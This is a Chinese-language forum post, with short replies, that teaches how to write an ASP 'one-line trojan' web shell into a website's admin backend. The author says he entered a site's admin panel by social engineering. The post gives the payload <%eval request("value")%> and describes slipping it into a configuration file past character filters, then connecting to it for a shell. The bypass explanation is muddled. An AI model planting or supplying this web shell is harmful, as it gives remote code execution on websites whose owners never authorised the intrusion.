帮你在后台写入一句话木马
今天来教大家如何在后台写入一句话木马。一句话木马整体来说,为我们渗透者提交了很多的方便...但是时代在进步.程序员的思想也在进步..他们会想出如何在前台或者后台来过滤你的一句话的特殊字符...
今天下午到检测某XX站点,用社工进入了后台...但是后台根本没有办法让我们拿到shell!也就要用到一句话木马
我们来看下ASP常用的一句话木马格式..
<%eval request("value")%> 【示例】
注意:一句话千万别乱提交到配置文件,没有源码建议别到站点测试!!因为很容易破坏到文件..搞到访问不了..这样你不好!
站长也不好对吧?
比如说这个程序.过滤了特殊字符" <% ()
那么我们提交<%eval request("value")%>
这样的话整体来说已经提交到配置文件去了..连接下就OK。。只是针对而已..建议别转换数字或者英文字母.看情况转换吧.
思路好就行了 垃圾垃圾
垃圾垃圾垃圾垃圾 我很喜欢1楼的头像`。,``` 看贴回帖拿分走人~~~~~~~~~~~~
页:
[1]